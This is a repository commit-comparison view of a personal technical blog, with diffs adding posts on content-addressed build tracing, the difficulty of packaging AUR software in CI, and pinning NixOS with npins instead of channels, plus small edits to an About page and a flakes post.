Compare commits

...

10 commits

Author SHA1 Message Date
Jade Lovelace
07074b5345 Pinning nixos with npins 2024-05-20 13:42:40 -07:00
Jade Lovelace
4d83323451 pinning nix things 2024-05-19 19:10:35 -07:00
Jade Lovelace
1f33d774c2 draft 2024-04-08 19:41:41 -07:00
Jade Lovelace
20934137a6 update flakes arent real 2024-04-08 19:41:25 -07:00
Jade Lovelace
c12a6dd830 reproducible pwning 2024-03-18 13:39:01 -07:00
Jade Lovelace
06267b2bf7 packaging draft 2024-03-10 18:56:14 -07:00
Jade Lovelace
e9e9a55b51 update about page 2024-02-14 00:17:19 -08:00
Jade Lovelace
9cdbf1eaf1 wow another typo 2024-02-13 14:43:13 -08:00
Jade Lovelace
ad7288ed41 fix typo in flakes 2024-02-13 14:39:25 -08:00
Jade Lovelace
0c81e45ce4 build systems Content 2024-01-27 19:42:48 -08:00
9 changed files with 1509 additions and 19 deletions

View file

@ -9,20 +9,23 @@ isPage = true
+++
Hi!
I'm an undergraduate student in Computer Engineering at the University of
British Columbia.
I'm an final-year undergraduate student in Computer Engineering at the
University of British Columbia.
I have done mechanical design for ThunderBots, a RoboCup Small Size League team
building soccer-playing robots. Prior to this, I was on a 4 person team
participating in Skills Canada Robotics, and in my last year of high school, we
had the opportunity to [go to Nationals in
Halifax](/blog/i-competed-in-skills-canada-robotics), where we achieved first
place for Saskatchewan.
In my spare time, when I am not dreaming of all computers landing on the sun, I
work on [NixOS](https://nixos.org) in various places in the project, and a
whole slew of projects you can find on my GitHub profile. I'm most interested
in compilers, operating systems, and build systems. I am a full stack
developer: I can competently write both SystemVerilog and websites, and most
things in between: programming languages are a dime a dozen and I speak a lot
of them, from Rust to Haskell, C/C++, Python, to Fake Haskell That Compiles to
Bash (Nix). I often cosplay (perhaps too successfully) as a build engineer.
Other than robotics, I am most interested in Rust and embedded systems,
especially the security thereof.
When I *am* dreaming of computers experiencing solar destruction, I like
sewing, going on long walks, and cooking.
To contact me, email `jade` at this domain (jade dot fyi).
To contact me, email `jade` at this domain (jade dot fyi) or ping me [on
fedi](https://hachyderm.io/@leftpaddotpy).
Jade
she/they

View file

@ -0,0 +1,249 @@
+++
date = "2024-01-27"
draft = false
path = "/blog/build-systems-ca-tracing"
tags = ["build-systems", "nix"]
title = "Build systems: content addressed tracing"
+++
An idea I have lying around is something I am going to call "ca-tracing" for
the purposes of this post. The concept is to instrument builds and observe what
they actually did, and record that for future iterations such that excess
dependencies can be ignored if, *even if inputs changed*, the instructions are
the same and the files actually observed by the build are the same.
# Implementation
## Assumptions
This idea assumes a hermetic build system, since we need to know if anything
might have differed from build to build, so we need a complete accounting of
the inputs to the build. It is not necessarily the case that such a hermetic
build system would be Nix-like, however, it is easiest to describe on top of a
Nix-like; first one with build identity, then one that lacks build identity
like Nix.
This also assumes a content-addressed build system with early cut-off like Nix
with [ca-derivations]. In Nix's case, input-addressed builds are executed, then
renamed to a content-addressed path: if a build with different inputs is
executed once more with the same output, it is recorded as resolving to that
output, and further builds are cut off.
[ca-derivations]: https://www.tweag.io/blog/2021-12-02-nix-cas-4/
<aside>
Build identity is a term I invented referring to the idea that a build can know
about previous builds. Systems without build identity include those which
identify builds entirely with hashes, and the names are meaningless, such as
Nix. Build identity is an assumption that causes problems for multitenancy in
build systems, since there may be several versions of a package being built all
the time, based off of different versions from each other. I've [used the term
in a previous post][postmodern-build-sys].
[postmodern-build-sys]: https://jade.fyi/blog/the-postmodern-build-system/
There may be a recognized term for this property that I have not found, please
[email me](https://jade.fyi/about) or poke me on Mastodon if you know it.
</aside>
## Conceptual implementation
Conceptually, a build is a function:
> (*inputs*, *instructions*) -> *outputs*
We wish to narrow *inputs* to *inputs<sub>actual</sub>*, and save this
information alongside *outputs*. In a following build, we can then verify if
*instructions'* matches a previous build (*instructions*) and if so, extract
the values of the same dynamically observed *inputs'<sub>actual</sub>*, but
relative to *inputs'* and compare them to the values of
*inputs<sub>actual</sub>* from the previous build.
Since our build system is hermetic, if this hits cache, it can be assumed to have
identical results, modulo any nondeterminism (which we assume to be
unfortunate but unproblematic, and is there regardless of this technique).
## Making it concrete
A build ("derivation" in Nix) in a Nix-like system is a specification of:
* Inputs (files, other derivations)
* Environment variables
* Command to execute
The point of ca-tracing is to remove excess inputs, so let's contemplate how to
do that.
### File names
The inputs are files named based on `hash(contents)` in Nix, but we don't
know which contents we will actually access. This is a problem, since the file
paths of *inputs* need to remain constant across multiple executions of the
build (the paths for *inputs* must equal the paths for *inputs'*), since the
part of *inputs* that changed may be irrelevant to this build.
In a system that doesn't look like Nix, the input file paths might be the same
across two builds on account of not containing hashes, so this would not be a
problem.
We can solve the file names problem by replacing the hash parts in the input
filenames with random values per-run. These hashes should never appear, even in
part, in the output, if the builder is not doing things with them that would
render the build non-deterministic.
Unfortunately the file names may appear in the output through the ordering of
deterministic hash tables, for instance, which could be a problem; this exists
in practice in ELF hash tables for instance. Realistically we would need
file-type-specific rewriters to fixup execution output to a deterministic
result following multiple runs.
We would also have to rewrite those hashes within blocks of data read from
within the builder, but that's *possibly* just a few FUSE crimes away to be
able to do live, on-demand.
Following the build, the temporary hashes of the inputs can be substituted for
their concrete values pointing to the larger inputs †.
<aside>
† This creates a similar content-addressing equivalence problem as
[ca-derivations] themselves could introduce if they were differently designed,
where two paths might mean the same thing. The solution adopted by
ca-derivations is to hash the output with placeholders in place of its own hash
and then substitute the hash of the path within all files in it.
Specifically, consider a derivation Dep that depends on a derivation A.
Derivation A changes some file not looked at by Dep, producing derivation B,
and Dep has its rebuild skipped. Should the resulting path for Dep point to A
or B?
Perhaps the solution here is to use a content-addressed store or filesystem
with block cloning (zfs, btrfs, xfs) for which shoving duplicates in it is
~free, and actually *realize* the value of *inputs<sub>actual</sub>* to disk.
This would sadly not eliminate the need for randomizing and rewriting input
paths due to causality, since we simply do not know what paths are referenced
yet.
</aside>
### Tracing, filesystem
To trace a build, one would have to pull the filesystem activity. This is
possible with some BPF tracing constrained to some cgroup on Linux, so that is
not the hard part.
The data that would have to be known is:
* Observed directory listings with hashes
* Read file names matching *inputs*, with associated hashes
* Extremely annoyingly: `fstat(2)` results for all queried files in inputs
(this is extremely annoying because everything calls `fstat` all the time
pointlessly or to check for files being present, and it includes things like
the length of a file, which could *in principle* cause unsoundness if not
recorded).
This would then all be compared to the equivalent paths in *inputs'* and if the
hashes match, the previous build could be immediately used.
## Avoiding build identity; how would this work in Nix?
Nix is built on top of an on-disk key-value store (namely, the directory
`/nix/store`), which is a mapping:
> Hash -> Value
Thus, we just need to construct a hash in such a way that both Build and Build'
get the same hash value.
We could achieve this by modifying the derivation in a deterministic manner
such that two modified-derivations share a hash if they could plausibly have
ca-tracing applied. Specifically, rewrite the input hashes to something like
the following:
> hash("ca-tracing" + name + position-in-inputs) + "-" + name
When a build is invoked, modify the derivation, hash it, and check for the
presence of a record of a modified-derivation of the same hash, and then check
if the actually-used filesystem objects when applied to *inputs'* remain the
same.
# Use cases
This idea is almost certainly best suited for builds using the smallest
possible unit of work, both in terms of usefulness and likelihood of bugs in
the rewriting. To use the terminology from [Build Systems à la Carte][bsalc],
it is likely most useful for systems that are closer to constructive traces
than deep constructive traces.
[bsalc]: https://www.microsoft.com/en-us/research/uploads/prod/2018/03/build-systems.pdf
For example, if this is applied to individual compiler jobs in a C++ project,
it can eliminate rebuilds from imprecise build system dependency tracking,
whereas if the derivation/unit of work is larger, the rebuild might be
necessary anyway.
# Problems
* There could exist multiple instances of a modified-derivation with different
filesystem activity, due to, say, a bunch of rebuilds against very
differently patched inputs. This system would have to be able to either
represent that or just discard old ones.
* Real programs abuse `fstat(2)` way too much and it's very likely that this
whole thing might not actually get any cache hits in practice if `fstat`
calls are considered. Without visibility into processes we cannot know if
`fstat` calls' results are actually used for anything more than checking if a
file exists.
This might benefit from some limited dynamic tracing inside processes to
determine whether the fstat result is actually read.
* The whole enterprise is predicated on generalized sound rewriting, which is
likely very hard; see below.
## Naive rewriting is a bad idea
The implementation of ca-derivations itself, where it just rewrites hashes
appearing in random binaries with the moral equivalent of `sed`, is extremely
unsound with respect to compression, ordered structures (even NAR files would
fall victim to this), and any other kind of non-literal storage of store paths,
and this approach just adds yet more naive rewriting that is likely to explode
spectacularly at runtime.
Naively rewriting store paths is an extension of the original idea of Nix doing
runtime dependencies by naively scanning for reference paths. However,
crucially, the latter does not *modify* random binaries without any knowledge
of their contents, and the worst case scenario for that reference scanning is a
runtime error when someone downloads a binary package.
Realistically, this would have to be done with a "[diffoscope] of rewriters",
which can parse any format and rewrite references in it. We can check soundness of a
build under rewriting by simply running it more times. The rewriter need
not be a trusted component, since its impact is only as far as breaking your
binaries (reproducibly so), which Nix is great at already!
In an actual implementation, I would even go so far as saying the rewriter
*must not* be part of Nix since it is generally useful, and it is fundamentally
something that would have to move pretty fast and perhaps even have per-project
modifications such that it cannot possibly be in a Nix stability guarantee.
[diffoscope]: https://diffoscope.org/
# Related work
This is essentially the idea of edef's incomplete project [Ripple], an
arbitrary-program memoizer, among other work, but significantly scaled down to
be less general and possibly more feasible. Compared to her project, this idea
doesn't look into processes at all, and simply involves tracing filesystem
accesses to read-only resources in an already-hermetic build system.
Thanks to edef for significant feedback and discussion about this post. You can
[sponsor her on GitHub here][edef-gh] if you want to support her work on making
computers more sound such as the Nix content addressed cache project, tvix, and
also her giving these ideas to Arch Linux developers.
[edef-gh]: https://github.com/sponsors/edef1c
[Ripple]: https://nlnet.nl/project/Ripple/

View file

@ -167,11 +167,12 @@ even if the same package name appears in both. Magic ✨
That is, in the following intentionally-flawed-for-other-reasons `flake.nix`:
```nix
{...}: {
{
# ....
outputs = { nixpkgs, ... }:
let pkgs = nixpkgs.legacyPackages.x86_64-linux;
in {
packages.x86_64-linux.x = pkgs.callPackage ./package.nix { };
let pkgs = nixpkgs.legacyPackages.x86_64-linux;
in {
packages.x86_64-linux.x = pkgs.callPackage ./package.nix { };
};
}
```
@ -453,6 +454,12 @@ actually invoking `nixpkgs.lib.nixosSystem`. The latter is the much more
sinister part, and the reason I would strongly recommend inline modules with
closures instead of `specialArgs`: they break flake composition.
That being said, *either* using `specialArgs` *or* an inline module inside
`flake.nix`, rather than an option above, is the only way to inject module
imports. That is, if one uses some option like `imports = [ config.someOption
]`, it will cause an infinite recursion error. We would suggest putting the
imports inside an inline module inside `flake.nix` for this case.
To use `specialArgs`, an attribute set is passed into `nixpkgs.lib.nixosSystem`,
which then land in the arguments of NixOS modules:
@ -463,11 +470,11 @@ nixosConfigurations.something = nixpkgs.lib.nixosSystem {
specialArgs = {
myPkgs = nixpkgs;
};
modules = {
{ pkgs, lib, myPkgs }: {
modules = [
({ pkgs, lib, myPkgs }: {
# do something with myPkgs
}
};
})
];
}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 134 KiB

View file

@ -0,0 +1,256 @@
+++
date = "2024-01-27"
draft = true
path = "/blog/packaging-is-extremely-hard"
tags = ["build-systems", "arch-linux", "linux", "nix"]
title = "Packaging is extremely hard, or, why building AUR packages in CI is a nightmare"
+++
Packaging on a traditional distribution is challenging to say the least, and I
haven't seen any coherent descriptions of *why* hermetic build systems like Nix
eliminate an entire category of needing to think about certain things. Recently
a friend mentioned she was considering setting up a CI service for some AUR
packages by a trivial cron job, whereas my reaction to the idea of CI for Arch
packages is "that would take a month of work to do correctly".
Let's explore the inherent complexity in writing a CI service for basically any
binary distro; picking on Arch Linux is only because it is what I have
experience with, though they tend to be especially fast and loose with inherent
complexity. One could argue that Arch in particular is the Go of distros, since
it ignores a lot of hard things in order to ship a working distro, similarly to
[how Go famously solves complexity by ignoring it][golang]. This is not about
factionalism; it is about the choices of where distro maintainers have spent
their energy, and ignoring complexity is something that has its place.
Arch is known for having a large user maintained repository of non-reviewed
community-written packaging for most anything under the sun called the AUR.
This is a blessing and a curse, because Arch is extremely a binary distro.
Pretty much this entire post would apply to anyone maintaining a binary
repository for another distribution, except perhaps the part of building
packages maintained by other people in CI.
[golang]: https://fasterthanli.me/articles/i-want-off-mr-golangs-wild-ride
[rebuild-conds]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#The_workflow
[rebuild-detector]: https://github.com/maximbaz/rebuild-detector
## "Rebuild conditions are indeterminate", or, why C++ people are always talking about ABI
If you are a downstream consumer of an official binary package, such as being
an AUR packager, there is not really any obvious notice that you should rebuild
your package due to dependency updates, besides, perhaps, [rebuild-detector]
and upgrading your system regularly.
The way that release management is done at Arch Linux is that maintainers
updating libraries go and [ping all their colleagues][soname-bump] when their
upstream changed their software so it is no longer binary-compatible
("ABI-compatible"), represented by a "soname bump", e.g. changing the file name
`libc.so.5` -> `libc.so.6`. This is not terribly unusual among distros.
However, it's perfectly possible that packages break their ABI without updating
their soname, since most changes to C header files besides adding things will
break ABI in theory, for instance, changing `#define` constants or other such
things. So, if upstream is being impolite, they can cause bugs at any time, and
blatant changes can be caught by things like [abi-checker], though they don't
necessarily form part of the official process for Arch.
[abi-checker]: https://lvc.github.io/abi-compliance-checker/
[soname-bump]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#Run_sogrep_on_identified_soname_change
When packages are rebuilt without being updated, this is done by incrementing
`pkgrel` in the PKGBUILD, which is achieved automatically in the official repos
with `pkgctl build --rebuild` ([man page][pkgctl-build]) of the affected
packages. For example, for a version `0.20.10-1`, incrementing `pkgrel` would
produce a version `0.20.10-2`, which is uploaded to staging as well as pushed
to the package's own Git repo with `pkgctl release`.
After all the builds are made, `pkgctl db move` is invoked to move all the
packages over.
<aside>
One might wonder why there is all this `pkgrel` business to begin with, and it
is simply that the package manager will only see an update if the version
changed, and in most systems, only if the version changed *upwards*, by
default.
</aside>
[pkgctl-build]: https://man.archlinux.org/man/pkgctl-build.1.en
### Atomicity? Is that like a criticality incident?
{% image(name="./antifa-demon-core.png", colocated=true) %}
an antifaschistische aktion sticker with a demon core in the middle,
"ausgerutscht, trotzdem da" on top and "kernphysiker antifa" on the bottom
{% end %}
<aside>
Demon core shitpost [made by Agatha](https://fv.technogothic.net/@AgathaSorceress/111810771067247145).
</aside>
If the official repos operate by coordination between all the packagers, with a
staging area to atomically release rebuilds, it follows that AUR packagers can
expect that official repos can and will change at any time without notification
(unless one goes and looks at the development bug tracker).
<aside>
**Uncertain** fact: the Arch repos seem to not have any versioning on the *set
of packages together*. Packages are moved to the primary repos, and then they
are there, but this seems to be just done by poking a file on disk; there is no
atomic versioning of the set as a whole, aside from hoping the [Arch Linux
Archive][arch-arm] has a useful snapshot on the relevant day.
</aside>
[arch-arm]: https://wiki.archlinux.org/title/Arch_Linux_Archive
This is a relatively reasonable process for a distro that doesn't fully
automate everything and even one that does, but it is kind of a problem if you
aren't an official maintainer working in the official repos, since you aren't
in the notification list.
Note also that the information that the AUR itself has on packages is not
sufficient to send emails about this either; this isn't the fault of the
Arch developers.
However, the upshot of this is that if one is using an AUR package maintained
by someone else, there is no guarantee anyone has tried building it against the
latest versions of the official repos, and it is in fact also impossible to
know what versions it was successfully built against. A local build of an AUR
package can get arbitrarily out of sync with the official repos and it is not
easily possible to reconstruct the state of all the repos that went into
building it.
Stuff randomly breaking due to repositories using the time of day as a software
version pinning mechanism is not just an AUR problem: it is much, much worse on
third-party binary repositories. For instance, even though [archzfs] is by far
one of the best executed third party repositories, in large part on account of
them running a CI service, it still can be out of time with the versions of the
kernel.
[archzfs]: https://github.com/archzfs/archzfs
However, the instance where third party repositories get *really* out of sync
with things is for things like Manjaro which have repositories delayed by two
weeks relative to Arch for "stability". This doesn't work out very well.
## The source-build-source cycle
For any package, a CI system that fully automates the packaging workflow needs
to be able to increment `pkgrel` on any dependency updates and trigger a
rebuild automatically. This is stored in the package source files: the CI
system has to be able to push to the sources automatically.
This also means that a CI system building someone else's AUR packages needs to
*fork any packages it builds*, since it must be able to update `pkgrel` based
on its own detection of upstream changes, without worrying about the AUR
maintainer doing it.
### Building someone else's stuff? Better reconcile it with automated local changes automatically
However, the even worse corrolary of the above is if the other maintainer
*does* update `pkgrel`, since then you have to reconcile your own maintained
`pkgrel` and ensure that it strictly increases even with the maintainer's
changes.
Another cause of needing to rebuild AUR sourced packages is the AUR package
itself changing, perhaps because upstream updated it and the AUR packager
updated their packaging. In that case, one has to discard local changes and
hope that versions strictly increased so pacman will install the new one.
## Weightless! In the package manager! Loopy dependency graphs
Debian ([documentedly so][debian-loopy]) and most other binary distros don't
have any tooling preventing packages forming circular build dependency graphs.
The most trivial one that exists in most any binary distribution is the C++
compiler, which is itself likely a build dependency of the C++ compiler since
both clang and gcc are written in C++.
How does one get the first compiler? In most distros, the answer is
"someone built it manually from somewhere and shoved it in /usr/local and then
built the first compiler package using some crimes". However, that path is, for
the most part, not documented or clearly reproducible. It is the typical state
of affairs to have the *distro repository itself* be a ball of inscrutable
mutable state.
In NixOS it's [a tarball of compilers that's built with Nix and is occasionally
updated][nixos-bootstrap-tools], and will in the future [be rooted in a 256
byte binary][nixos-minimal-bootstrap] after which everything is built from
source, which is what Guix also does. There's a bunch more information about
the efforts to bootstrap from nearly nothing at [bootstrappable.org], as well
as [on the Guix blog][fsb].
[bootstrappable.org]: https://bootstrappable.org/
[fsb]: https://guix.gnu.org/en/blog/2023/the-full-source-bootstrap-building-from-source-all-the-way-down/
[nixos-bootstrap-tools]: https://github.com/nixos/nixpkgs/blob/d0efa70d8114756ca5aeb875b7f3cf6d61543d62/pkgs/stdenv/linux/make-bootstrap-tools.nix#L237-L256
[nixos-minimal-bootstrap]: https://github.com/nixos/nixpkgs/blob/3dcd819caa03c848a9a06964857e12e4b789239e/pkgs/os-specific/linux/minimal-bootstrap/default.nix
[debian-loopy]: https://wiki.debian.org/CircularBuildDependencies
## Package tests? p--package integration t-tests??
So you want to write an integration test for your package on Arch Linux. That's
too bad, because there's not a testing framework, because there are not tests.
Packages can run the software's testsuite, but there is no officially supported
integration testing solution.
# Software engineering fixes this
I have spilled a thousand words on how traditional binary distros (that [are
not Fedora][fedora-ci]) spend a significant amount of labour doing rebuilds
largely by hand, with scripts on their local machines, coordinating amongst
maintainers. Most packages are built on developer machines, though [never on
Fedora][fedora-ci2] and only [sometimes on Debian][debian-ci], and thus cannot
necessarily be trusted to not be contaminated by the squishy mutable stuff that
happens on dev machines. Even though they are typically built in chroots, the
environment is not controlled.
[debian-ci]: https://ci.debian.net/
I have addressed how packages require manually poking `pkgrel` every time a
rebuild is necessary, and how the need for rebuilds affects downstream
builders. This is, incidentally, [largely still true on
Fedora][fedora-updates].
The (pessimistic but sound) way to manage rebuilds is to just recompile every
downstream when a single bit of any dependency changes. This is the approach
used by Nix and it trades a significant but not unaffordably large (for a big
distro) amount of computer time in a build cluster for not having to think
about any of this. ABI breaks cannot affect the distribution because everything
was built against the exact same libraries, together.
A Nix-like hermetic build system doesn't have a concept of `pkgrel`, because
packages are just what is in the single monorepo source tree on a given commit.
There is nothing wrong with the other approach of multiple repositories and
repository metadata that doesn't expose a single history, but it would be
useful to be able to cleanly ensure that a group of machines have exactly the
same packages on them as of some epoch, say.
Facebook has made a tool for RPM distributions that builds OS images with
Buck2, called [Antlir]. This takes snapshots of repositories and builds OS
images with a hermetic build system, such that they receive the exact same
result every time.
[Antlir]: https://facebookincubator.github.io/antlir/docs/
ABI breaks can *also* not break downstream consumers of `nixpkgs`, because Nix
builds out-of-tree stuff exactly the same using the same version set as
anything else: unlike every binary distribution, the distribution packages are
not special, and building out-of-tree stuff will never randomly break due to
ABI changes.
NixOS has a robust and widely used (1040 of them) [integration
test][nixos-integration-tests] system, like Fedora, testing most parts of the
system and [gating repository updates][nixos-gating] like Fedora Bodhi.
[nixos-gating]: https://status.nixos.org/
[nixos-integration-tests]: https://nix.dev/tutorials/nixos/integration-testing-using-virtual-machines.html
[fedora-updates]: https://docs.fedoraproject.org/en-US/fesco/Updates_Policy/
[fedora-ci2]: https://discussion.fedoraproject.org/t/report-from-the-reproducible-builds-hackfest-during-flock-2023/87469
[fedora-ci]: https://docs.fedoraproject.org/en-US/ci/

View file

@ -0,0 +1,368 @@
+++
date = "2024-05-20"
draft = false
path = "/blog/pinning-nixos-with-npins"
tags = ["nix"]
title = "Pinning NixOS with npins, or how to kill channels forever without flakes"
+++
> Start of Meetup: "hmm, Kane is using nixos channels, that's not good, it's going to gaslight you"<br/>
> 6 hours later: Utterly bamboozled by channels<br/>
> 6.5 hours later: I am no longer using channels
\- [@riking@social.wxcafe.net](https://social.wxcafe.net/@riking/112465844452065776)
Nix channels, which, just like Nix, is a name overloaded to mean several
things, are an excellent way to confuse and baffle yourself with a NixOS
configuration by making it depend on uncontrolled and confusing external
variables rather than being self-contained. You can see [an excellent
explanation of the overloaded meanings of "channels" at samueldr's
blog][samueldr-channels]. In this post I am using "channels" to refer to the
`nix-channel` command that many people to manage what `<nixpkgs>` points to,
and thus control system updates.
[samueldr-channels]: https://samuel.dionne-riel.com/blog/2024/05/07/its-not-flakes-vs-channels.html
It is a poorly guarded secret in NixOS that `nixos-rebuild` is simply a bad
shell script; you can [read the sources here][nixos-rebuild]. I would even go
so far as to argue that it's a bad shell script that is a primary contributor
to flakes gaining prominence, since its UX on flakes is so much better: flakes
don't have the `/etc/nixos` permissions problems *or* the pains around pinning
that exist in the default non-flakes `nixos-rebuild` experience. We rather owe
it to our users to produce a better build tool, though, because `nixos-rebuild`
is *awful*, and there are currently the beginnings of efforts in that direction
by people including samueldr; `colmena` is also an example of a better build
tool.
Both the permissions issue and the pinning are extremely solvable problems
though, which is the subject of this post. [Flakes have their
flaws][samueldr-flakes] and, more to the point, plenty of people just don't
want to learn them yet, and nobody has yet met people where they are at with
respect to making this simplification *without* doing it with flakes.
This is ok! Let's use something more understandable that does the pinning part
of flakes and not worry about the other parts.
[samueldr-flakes]: https://samuel.dionne-riel.com/blog/2023/09/06/flakes-is-an-experiment-that-did-too-much-at-once.html
This blog post teaches you how to move your NixOS configuration into a repo
wherever you want, and eliminate `nix-channel` altogether, instead pinning the
version of `<nixpkgs>` and NixOS in a file in your repo next to your config.
[nixos-rebuild]: https://github.com/nixos/nixpkgs/blob/b5c90bbeb36af876501e1f4654713d1e75e6f972/pkgs/os-specific/linux/nixos-rebuild/nixos-rebuild.sh
# Background: what NixOS builds actually do
First, let's say how NixOS builds actually work, skipping over all the remote
build stuff that `nixos-rebuild` also does.
For non-flakes, `<nixpkgs/nixos>` is evaluated; that is, [`nixos/default.nix`][nixos-defaultnix] in
`<nixpkgs>`. This resolves the `NIX_PATH` entry `<nixos-config>` as the first
user-provided NixOS module to evaluate, or alternatively
`/etc/nixos/configuration.nix` if that doesn't exist. For flake configurations,
substitute `yourflake#nixosConfigurations.NAME` in your head in place of
`<nixpkgs/nixos>`.
[nixos-defaultnix]: https://github.com/nixos/nixpkgs/blob/6510ec5acdd465a016e5671ffa99460ef70e6c25/nixos/default.nix
The default `NIX_PATH` is the following:
```
nix-path = $HOME/.nix-defexpr/channels nixpkgs=/nix/var/nix/profiles/per-user/root/channels/nixpkgs /nix/var/nix/profiles/per-user/root/channels
```
That is to say, unless it's been changed, `<nixpkgs>` will reference root's
channels, managed with `nix-channel`.
Next, the attribute `config.nix.package` of `<nixpkgs/nixos>` is evaluated then
built/downloaded (!!) unless it is a flake config (or `--no-build-nix` or
`--fast` is passed). Then the attribute `config.system.build.nixos-rebuild` is
likewise evaluated and the `nixos-rebuild` is re-executed into the one from the
future configuration instead of the one from the current configuration, unless
`--fast` is passed.
Once your configuration has been evaluated once or twice pointlessly, it is
evaluated a third time, for the attribute `config.system.build.toplevel`, and
that is built to yield the new system generation.
This derivation is what becomes `/run/current-system`: it contains a bunch of
symlinks to everything that forms that generation such as the kernel, initrd,
`etc` and `sw` (which is the NixOS equivalent of `/usr`).
Finally, `the-build-result/bin/switch-to-configuration` is invoked with an
argument `switch`, `dry-activate`, or similar.
---
From this information, one could pretty much write a NixOS build tool: it really is
just `nix build -f '<nixpkgs/nixos>' config.system.build.toplevel` (in old
syntax, `nix-build '<nixpkgs/nixos>' -A config.system.build.toplevel`), then
`result/bin/switch-to-configuration`. That's all it does.
# Background: what is npins anyway?
[`npins`][npins] is the spiritual successor to [niv], the venerable Nix pinning
tool many people used before switching to flakes. But what is a pinning tool
for Nix anyway? It's just a tool that finds the latest commit of something,
downloads it, then stores that commit ID and the hash of the code in it in a
machine-readable lock file that you can check in. When evaluating your Nix
expressions, they can use `builtins.fetchTarball` to obtain that exact same
code every time.
That is to say, a pinning tool lets you avoid having to copy paste Git commit
IDs around, and ultimately does something like this in the end, which hands you
a path in the Nix store with the code at that version.
```nix
builtins.fetchTarball {
# https://github.com/lix-project/lix/tree/main
url = "https://github.com/lix-project/lix/archive/992c63fc0b485e571714eabe28e956f10e865a89.tar.gz";
sha256 = "sha256-L1tz9F8JJOrjT0U6tC41aynGcfME3wUubpp32upseJU=";
name = "source";
};
```
Let's demystefy how pinning tools work by writing a trivial one in a couple of
lines of code.
First, let's find the latest commit of nixos-unstable with `git ls-remote`:
```
~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable
4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 refs/heads/nixos-unstable
~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable | cut -f1
4a6b83b05df1a8bd7d99095ec4b4d271f2956b64
```
Then we can construct an archive URL for that commit ID, and fetch it into the
Nix store:
```
~ » nix-prefetch-url --name source --unpack https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz
0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq
```
And finally fetch it from a Nix expression:
```
~ » nix repl
Lix 2.90.0-lixpre20240517-0d2cc81
Type :? for help.
nix-repl> nixpkgs = builtins.fetchTarball { url = "https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz"; name = "source"; sha256 = "0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq"; }
nix-repl> nixpkgs
"/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"
```
This is essentially exactly what npins does, minus the part of saving the
commit ID and hash into `npins/sources.json`.
We could write a simple shell script to do this, perhaps called
`./bad-npins.sh`:
```bash
#!/usr/bin/env bash
name=nixpkgs
repo=https://github.com/nixos/nixpkgs
branch=nixos-unstable
tarballUrl="$repo/archive/$(git ls-remote "$repo" nixos-unstable | cut -f1)"
sha256=$(nix-prefetch-url --name source --unpack "$tarballUrl")
# initialize sources.json if not present
[[ ! -f sources.json ]] && echo '{}' > sources.json
# use sponge from moreutils to deal with jq not having the buffering to safely
# do in-place updates
< sources.json jq --arg sha256 "$sha256" --arg url "$tarballUrl" --arg name "$name" \
'.[$name] = {sha256: $sha256, url: $url}' \
| sponge sources.json
```
and then from Nix we can load the sources:
```nix
let
srcs = builtins.fromJSON (builtins.readFile ./sources.json);
fetchOne = _name: { sha256, url, ... }: builtins.fetchTarball {
name = "source";
inherit sha256 url;
};
in
builtins.mapAttrs fetchOne srcs
```
Result:
```
~ » nix eval -f sources.nix
{ nixpkgs = "/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"; }
```
We now have a bad pinning tool! I wouldn't recommend using this shell script, since
it doesn't do things like check if redownloading the tarball is necessary, but
it is certainly cute and it does work.
`npins` is pretty much this at its core, but well-executed.
[npins]: https://github.com/andir/npins
[niv]: https://github.com/nmattia/niv
# Fixing the UX issues
We know that:
1. `<nixpkgs>` as seen by `nixos-rebuild` determines what version of nixpkgs
is used to build the configuration.
2. Where the configuration is is simply determined by `<nixos-config>`
3. Both instances of duplicate configuration evaluation are gated on `--fast`
not being passed.
So, we just have to invoke `nixos-rebuild` with the right options and
`NIX_PATH` such that we get a config from the current directory with a
`nixpkgs` version determined by `npins`.
Let's set up npins, then write a simple shell script.
```
$ npins init --bare
$ npins add --name nixpkgs channel nixos-unstable
```
You can also use `nixos-23.11` (or future versions once they come out) in place
of `nixos-unstable` here, if you want to use a stable nixpkgs.
Time for a simple shell script. Note that this shell script uses `nix eval`,
which we at *Lix* are very unlikely to ever break in the future, but it does
require `--extra-experimental-features nix-command` as an argument if you don't
have the experimental feature enabled, or
`nix.settings.experimental-features = "nix-command"` in a NixOS config. (The
experimental feature can be hacked around with
`nix-instantiate --json --eval npins/default.nix -A nixpkgs.outPath | jq -r .`,
which works around `nix-instantiate --eval` missing a `--raw` flag, but this is
kind of pointless since we are about to use flakes features in a second)
```bash
#!/usr/bin/env bash
cd $(dirname $0)
# assume that if there are no args, you want to switch to the configuration
cmd=${1:-switch}
shift
nixpkgs_pin=$(nix eval --raw -f npins/default.nix nixpkgs)
nix_path="nixpkgs=${nixpkgs_pin}:nixos-config=${PWD}/configuration.nix"
# without --fast, nixos-rebuild will compile nix and use the compiled nix to
# evaluate the config, wasting several seconds
sudo env NIX_PATH="${nix_path}" nixos-rebuild "$cmd" --fast "$@"
```
# Killing channels
Since building the config successfully, we can now kill channels to stop their
reign of terror, since we no longer need them to build the configuration at
all. Use `sudo nix-channel --list` and then `sudo nix-channel --remove
CHANNELNAME` on each one. While you're at it, you can also delete `/etc/nixos`
if you've moved your configuration to your home directory.
Now we have a NixOS configuration built without using channels, but once we are
running that system, `<nixpkgs>` will still refer to a channel (or nothing, if
the channels are deleted), since we didn't do anything to `NIX_PATH` on the
running system. Also, the `nixpkgs` flake reference will point to the latest
`nixos-unstable` at the time of running a command like `nix run nixpkgs#hello`.
Let's fix both of these things.
For context, *by default*, on NixOS 24.05 and later, due to [PR
254405](https://github.com/NixOS/nixpkgs/pull/254405), *flake*-based NixOS
configs get pinned `<nixpkgs>` and a pinned `nixpkgs` flake of the exact same
version as the running system, such that `nix-shell -p hello` and `nix run
